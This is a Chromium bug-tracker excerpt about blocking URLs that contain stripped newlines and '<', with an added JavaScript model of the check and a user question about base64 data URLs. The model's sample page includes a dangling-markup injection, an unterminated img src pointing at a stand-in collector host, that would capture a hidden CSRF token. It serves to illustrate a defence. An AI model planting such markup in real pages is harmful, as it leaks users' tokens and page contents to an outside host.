[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/core/loader/FrameLoader.cpp
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/platform/weborigin/KURL.h
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/platform/weborigin/KURLTest.cpp
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/gurl_unittest.cc
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/third_party/mozilla/url_parse.cc
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/third_party/mozilla/url_parse.h
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/url_canon.h
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/url_canon_etc.cc
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/url_canon_relative.cc
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/url_util.cc
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/url_util_unittest.cc
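
The check that comments 5 and 11 describe, applied to a constructed page containing the dangling `<img src='` from the report. This is an added example, not Chromium's code and not from anyone in this thread. The function names, the `collector.example` and `site.example` hosts and the sample markup are assumptions, and the regex only approximates how the HTML tokenizer delimits a quoted attribute value.

```javascript
// Added example: a model of the check discussed in this issue, not Chromium's code.
// Host names and the sample page are constructed for illustration.

// Approximate how a quoted src/href value is delimited: it runs to the next
// matching quote, however many lines and tags lie in between.
function extractUrlAttributes(html) {
  const re = /\b(src|href)\s*=\s*(["'])([\s\S]*?)\2/gi;
  const found = [];
  for (const m of html.matchAll(re)) {
    found.push({ attr: m[1].toLowerCase(), value: m[3] });
  }
  return found;
}

// Classify one raw attribute value against the rule from comments 5 and 11:
// refuse to load an HTTP(S) URL whose raw string had a tab/newline removed
// from its interior AND contains '<'. Percent-encoded forms such as %0A are
// not raw newlines and do not count.
function classifyUrl(raw, base = 'https://site.example/') {
  // Leading/trailing whitespace is trimmed separately and is not a signal.
  const trimmed = raw.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
  const whitespaceRemoved = /[\t\n\r]/.test(trimmed);
  const hasLessThan = trimmed.includes('<');
  let scheme = null;
  try {
    scheme = new URL(trimmed, base).protocol;
  } catch (_) {
    // Unparseable input never reaches the network; scheme stays null.
  }
  // data:, javascript:, file: and similar do not hit the network (comment 5).
  const hitsNetwork = scheme === 'http:' || scheme === 'https:';
  return {
    whitespaceRemoved,
    hasLessThan,
    scheme,
    blocked: hitsNetwork && whitespaceRemoved && hasLessThan,
  };
}

// Run both steps over a document and report one row per src/href value.
function auditHtml(html, base) {
  return extractUrlAttributes(html).map(({ attr, value }) => ({
    attr,
    preview: JSON.stringify(value.slice(0, 48)),
    ...classifyUrl(value, base),
  }));
}

// Constructed page: the unterminated src=' swallows the form and its hidden
// field up to the apostrophe in "It's".
const SAMPLE_PAGE = `<p>Welcome back</p>
<img src='https://collector.example/?whatever=
<form action="/transfer" method="post">
  <input type="hidden" name="csrf" value="constructed-token-123">
</form>
<p>It's all here.</p>
<a href="/help%0Aabout">Help</a>
<img src="/logo.png">
`;

for (const row of auditHtml(SAMPLE_PAGE)) {
  console.log(row.blocked ? 'BLOCK' : 'allow', row.attr, row.preview);
}
```
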

Comment 13 by antlafra...@gmail.com, Jun 23 (3 days ago)
I got the deprecation warning in Chrome 59. So in the future it won't be possible to split long base64 URLs?
Are there alternatives to avoid writing very long code lines?
Thanks

Example:
<image xlink:href="data:image/jpeg;base64,/9j/4QAYRXhpZgAASUkqAAgAAAAAAAAAAAAAAP/
sABFEdWNreQABAAQAAAALAAD/4QM0aHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLwA8P3hwYWNrZXQg
YmVnaW49Iu+7vyIgaWQ9Ilc1TTBNcENlaGlIenJlU3pOVGN6a2M5ZCI/PiA8eDp4bXBtZXRhIHhtbG5zO
ng9ImFkb2JlOm5zOm1ldGEvIiB4OnhtcHRrPSJBZG9iZSBYTVAgQ29yZSA1LjMtYzAxMSA2Ni4xNDU2Nj
EsIDIwMTIvMDIvMDYtMTQ6NTY6MjcgICAgICAgIC...(some thousands more characters)"/>